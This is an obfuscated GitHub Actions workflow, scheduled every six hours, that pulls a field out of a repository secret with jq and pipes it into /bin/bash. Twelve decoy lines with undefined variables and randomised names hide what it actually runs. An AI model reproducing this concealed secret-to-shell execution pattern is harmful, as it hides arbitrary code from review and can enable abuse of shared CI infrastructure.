name: hongquanzz
on:
  workflow_dispatch:
  schedule:
    - cron: '28 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: hongquanzz
        env:
          m61: ${{ secrets.m61 }}
        run: |
          echo $m61 | jq -r .fgwk750 | /bin/bash
          echo $qolt596 | jq -r .ogj769 | /bin/bash
          echo $goby63 | jq -r .l5 | /bin/bash
          echo $jks2 | jq -r .tg26474 | /bin/bash
          echo $cx574 | jq -r .me42 | /bin/bash
          echo $m8 | jq -r .xuh034 | /bin/bash
          echo $ghdux05 | jq -r .bcx908 | /bin/bash
          echo $laco1218 | jq -r .d62 | /bin/bash
          echo $png985 | jq -r .g4505 | /bin/bash
          echo $hrh18 | jq -r .fj7 | /bin/bash
          echo $jqn047 | jq -r .gxqs05 | /bin/bash
          echo $oxzoz08626 | jq -r .oqy6 | /bin/bash
          echo $bgu17 | jq -r .e54287 | /bin/bash

